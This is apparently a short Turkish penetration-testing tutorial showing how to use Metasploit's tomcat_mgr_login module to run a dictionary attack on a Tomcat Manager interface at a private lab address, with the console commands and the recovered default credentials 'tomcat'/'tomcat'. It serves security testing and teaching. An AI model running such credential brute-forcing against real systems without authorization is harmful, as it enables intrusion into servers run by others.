MSF tomcat_mgr_login Modülü ile Tomcat Uygulama Yönetimi Arayüzüne Erişim Sağlanabilecek Hesaplara Ait Kimlik Bilgilerinin Tespit Edilmesi

Sızma testleri sırasında, hedef olarak belirlenen Tomcat uygulama yönetimi arayüzüne erişim sağlayabilecek kullanıcı hesaplarının kimlik bilgilerinin tespit edilmesi gerekmektedir. Bu yazıda, MSF tomcat_mgr_login auxiliary modülü kullanılarak, kaba kuvvet (sözlük) saldırısı ile Tomcat uygulama yönetimi arayüzüne erişim sağlayabilecek hesaba ait kimlik bilgileri elde edilecektir.

Tomcat uygulama yönetimi arayüzü 192.168.30.139 IP adresinin TCP 8080. portundan hizmet veriyor olsun. Bu uygulamaya kaba kuvvet (sözlük) saldırı için kullanılabilecek hesapların adları ve parolaları özel olarak hazırlanabileceği gibi, modül içerisinde hazır gelen sözlükler de kullanılabilir.

Bu amaçla kullanılacak modül seçilir ve seçenekleri incelenir.

search tomcat_mgr_login
use auxiliary/scanner/http/tomcat_mgr_login
show options

 

Not: Varsayılan sözlükler yerine özel sözlükler de kullanılabilir.

Seçenekler ayarlanır.

set RHOSTS 192.168.30.139
set VERBOSE false
run

 

Tarama sonucundan da görüldüğü gibi, uygulamaya “tomcat” kullancı adı ve “tomcat” parolası ile giriş yapılabilir.

 

Böylece oturum açılmıştır.

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.